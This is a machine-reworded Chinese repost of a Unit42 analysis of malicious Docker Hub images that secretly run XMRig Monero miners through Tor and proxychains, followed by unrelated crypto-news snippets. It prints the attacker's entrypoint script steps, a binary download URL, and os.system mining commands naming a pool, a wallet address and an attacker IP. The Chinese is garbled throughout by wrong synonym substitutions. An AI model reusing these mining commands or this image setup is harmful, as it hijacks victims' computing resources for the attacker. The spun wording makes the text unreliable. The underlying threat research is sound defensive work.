简介
Docker容器是一种对软件进行打包处理的快捷方法,因而采用率不断添加。Unit42研究人员发现了一个名为azurenql的DockerHub社区用户账号,其中含有8个库房和6个恶意门罗币挖矿镜像。下面是账号和库房的截图:
图1.DockerHub上的恶意Docker镜像
表1是DockerHub账户的一切镜像,下载次数最多的镜像被下载了147万次。
表1.DockerHub账户上的镜像总结
Docker镜像结构
研究人员检查了azurenql/227_135:442的镜像结构,该镜像是按如下步骤结构的:
1、运用Ubuntu16.04.6LTS比如gcc、make、python等;
3、装置tor来对流量进行匿名处理,装备为默许端口9050;
/etc/tor/torrc
127.0.0.1:9050
4、仿制ProxyChains-NG源并从该源结构。ProxyChains的装备为默许装备来经过本地TorSOCKS代理衔接来路由流量。
/usr/local/etc/proxychains.conf
[ProxyList]
#defaultssetto"tor"
socks4127.0.0.19050
5、仿制挖矿软件XMRig的源,并从该源结构。
6、仿制定制的python脚本dao.py并将其设置为镜像的Entrypoint。
图2.镜像结构次序
脚本dao.py分析
镜像的作者包括了一个定制的Python脚本——dao.py,仿制在容器内敞开挖矿进程。如前所述,脚本被注册为镜像的Entrypoint,因而镜像启动后,脚本就会运转。
"Entrypoint":[
"/bin/sh",
"-c",
"python/etc/dao.py"
],
表1中的一切Docker镜像中都含有dao.py脚本或其变种。这些镜像中dao.py脚本的差异在于运用不同的XMRig指令行调用,如表2所示。
dao.py脚本的履行流如下所示:
1、核算体系内CPU核的数量;
2、设置hugepages体系特征来添加哈希率;
图3.设置hugepages体系特征来添加哈希率
3、装置Tor和构建依靠联系。
4、假如没有装置proxychains-ng,就从https://github.com/rofl0r/proxychains-ng.git装置;
5、假如/usr/local/bin中没有XMRig二进制文件(dll),就从https://github.com/nguyennhatduy2608/azures/raw/master/下载;
6、在/usr/local/binand/usr/bin中对XMRig二进制文件进行体系链接;
7、在后台启动Tor。
8、经过代理链来启动矿工,经过本地TorSOCKS代理来路由挖矿流量。dao.py脚本运用的不同挖矿指令如图2所示:
图4.运用proxychains启动挖矿的指令
脚本的履行工作流如图5所示:
图5.dao.py脚本履行序列
表2dao.py脚本中运用了的不同的挖矿指令
挖矿基础设施
加密钱银挖矿是处理复杂的核算难题,用户可以将买卖区块链接起来。恶意镜像运用受害者体系的处理能力来验证买卖。镜像的作者经过在用户环境中运转恶意镜像来挖矿。榜首种方法中,攻击者运用钱包ID直接提交挖到的区块到中心minexmr矿池。
os.system("xmrig--av=7--variant1--donate-level=0-o
stratum+tcp://pool.minexmr.com:4444-u
43ZBkWEBNvSYQDsEMMCktSFHrQZTDwwyZfPp43FQknuy4UD3qhozWMtM4kKRyrr2
Nk66JEiTypfvPbkFd5fGXbA1LxwhFZf+20001")
图6是钱包地址2020年4月-5月之间的挖矿活动。
图6.钱包ID活动
图7表明该钱包ID现已挖到了525.38XMR(门罗币),约合3.6万美元。
图7.钱包ID挖到的门罗币
第二种方法中,攻击者在运转挖矿池的保管服务中布置了实例用来搜集挖到的区块。
表2中的CryptoCommand列给出了该方法的示例:
os.system("proxychains4"+program+"--donate-level1-o
stratum+tcp://66.42.93.164:442--tls-t"+str(cores))
参考及来源:https://unit42.paloaltonetworks.com/cryptojacking-docker-images-for-mining-monero/
特别声明:以上内容(如有图片或视频亦包括在内)为自媒体渠道“网易号”用户上传并发布,本渠道仅提供信息存储服务。
来源:
此时快讯
【Arkham:dYdX上约5000万美元的YFI未平仓头寸被平仓】金色财经报道,据Arkham发文表示,近期YFI下跌近40%,dYdX上约5000万美元的未平仓头寸被平仓。在此之前,YFI近一半的未平仓头寸开于dYdX之上。
Arkham补充表示,通常情况下YFI在dYdX上的交易量非常低,但过去几天该代币价格的上涨使其未平仓合约达到了约6000万美元的峰值。
![[区块链梁丘]区块链梁丘:5.16比特币/以太坊晚间操作策略附带行情分析](https://pic.rmb.bdstatic.com/bjh/user/53d0c828e574b00e60e9d8251f8c18f5.jpeg?x-bce-process=image/resize,m_fill,w_300,h_200/format,f_auto)
![[区块链梁丘]区块链梁丘:5.9比特币/以太坊操作策略附带行情分析](https://pic.rmb.bdstatic.com/bjh/user/84a78e04c9cff40e184dd47ced3110e4.jpeg?x-bce-process=image/resize,m_fill,w_300,h_200/format,f_auto)
![[余烬Ember]以太坊ETF决议前市场悲观,美国司法部指控大学生涉及以太坊MEV洗钱行为](https://pic.rmb.bdstatic.com/bjh/user/31a4de3fbc29f1c46df415cdd9133c30.jpeg?x-bce-process=image/resize,m_fill,w_300,h_200/format,f_auto)